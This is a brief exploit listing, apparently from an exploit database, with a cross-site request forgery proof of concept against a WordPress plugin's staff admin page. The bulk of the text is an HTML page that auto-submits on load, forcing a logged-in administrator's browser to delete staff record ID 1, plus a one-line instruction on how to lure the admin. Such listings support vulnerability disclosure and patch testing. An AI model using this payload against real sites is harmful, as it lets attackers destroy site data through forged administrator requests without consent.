Share
## https://sploitus.com/exploit?id=WPEX-ID:88FB064E-0001-446C-8E43-9FE3FEFF6C1F
Make a logged in admin open a page with the code below, this will make them delete the Staff with ID 1
        
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=cip-staffs" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>